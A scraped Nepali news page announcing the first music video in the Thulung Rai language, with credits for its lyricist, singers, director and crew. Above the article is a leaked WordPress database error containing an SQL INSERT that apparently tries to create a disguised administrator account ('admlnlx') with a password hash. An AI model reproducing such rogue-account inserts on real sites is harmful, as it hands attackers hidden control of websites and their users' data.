WordPress database error: [Duplicate entry '0' for key 'PRIMARY']
INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$B0h7lH83s0dMQAqFcoF0lBGvcj83tS/', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-16 06:34:31', '', 'admlnlx', 'admlnlx')

थुलुङ भाषाको पहिलो म्युजिक भिडियो सार्वजनिक (भिडियो सहित) – Gaule Khabar

थुलुङ भाषाको पहिलो म्युजिक भिडियो सार्वजनिक (भिडियो सहित)

थुलुङ भाषाको पहिलो म्युजिक भिडियो सार्वजनिक (भिडियो सहित)

काठमाण्डौं । थुलुङ राई भाषाको पहिलो म्युजिक भिडियो युटुबमा सार्वजनिक भएको छ ।
जसिहब थुलुङको शब्द, गायक तथा सगीतकार जनम थुलुङको संगित, राजु कार्कीको संगीत संयोजनमा रहेको गीतमा संगितकार जनम थुुलुङ र रञ्जना थुलुङ राईको स्वार रहेको छ ।

थुलुङ भाषाको दोश्रो एल्बम ‘माम पाप’मा रहेको ‘हाम बोमु झाम’ (के गर्न सकिन्छ) बोलको गीतको म्युजिक भिडियो जनम थुलुङ अफिसियल युटुब च्यानलबाट सार्वजनिक गरिएको छ ।

उक्त म्युजिक भिडियोमा शसिकला थुलुङ राई, किमहाङ थुलुङ राई, हिमाङशु खालिङ राई र शैलबि राईको फिचरिङ हेर्न सकिनेछ ।

ममता थुुलुङ राईको निर्देशन/नृत्य निर्देशनमा निर्माण भएको म्युजिक भिडियोमा प्रवेश राईको छयाङ्कन, सुवास शाहाको सम्पादन रहेको छ ।
https://www.youtube.com/watch?v=ZgzWW4MpCZg

 

तपाइको प्रतिक्रिया दिनुहोस्

Your email address will not be published. Required fields are marked *

हामी तपाईंको इमे अरू सैसँग साझा र्दैनं।

ट्रेन्डिङ

धेरै कमेन्ट गरिएका